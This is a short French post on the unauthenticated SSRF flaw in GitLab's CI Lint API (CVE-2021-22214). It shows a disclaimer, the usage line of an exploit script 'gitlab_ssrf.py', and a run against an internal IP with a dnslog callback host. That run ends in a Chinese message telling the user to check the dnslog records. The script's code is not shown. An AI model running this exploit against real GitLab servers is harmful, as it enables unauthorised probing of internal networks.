
Vulnérabilité SSRF non autorisée de l'API Gitlab CI Lint (CVE-2021-22214)
Vulnérabilité SSRF non autorisée de l'API GitLab CI Lint (CVE-2021-22214)
Cet article ainsi que l'outil sont réservés au partage technique uniquement. Toute utilisation à des fins illégales est strictement interdite ; l'utilisateur assume seul toutes les conséquences qui en découlent.
$ python3 gitlab_ssrf.py
===============================================================
_____ _ _ _ _ _____ _____ _____ ______
/ ____(_) | | | | | / ____/ ____| __ \| ____|
| | __ _| |_| | __ _| |__ | (___| (___ | |__) | |__
| | |_ | | __| | / _` | '_ \ \___ \___ \| _ /| __|
| |__| | | |_| |___| (_| | |_) | ____) |___) | | \ \| |
\_____|_|\__|______\__,_|_.__/ |_____/_____/|_| \_\_|
CVE-2021-22214 Powered by r0cky Team ZionLab
===============================================================
Example:
python3 gitlab_ssrf.py <target> <dnshost>
cible : 192.168.80.136

$ python3 gitlab_ssrf.py http://192.168.80.136/ ssrf.sleg0x.dnslog.cn
===============================================================
_____ _ _ _ _ _____ _____ _____ ______
/ ____(_) | | | | | / ____/ ____| __ \| ____|
| | __ _| |_| | __ _| |__ | (___| (___ | |__) | |__
| | |_ | | __| | / _` | '_ \ \___ \___ \| _ /| __|
| |__| | | |_| |___| (_| | |_) | ____) |___) | | \ \| |
\_____|_|\__|______\__,_|_.__/ |_____/_____/|_| \_\_|
CVE-2021-22214 Powered by r0cky Team ZionLab
===============================================================
[+] 可能存在 GitLab SSRF 漏洞,请查看dnslog记录.
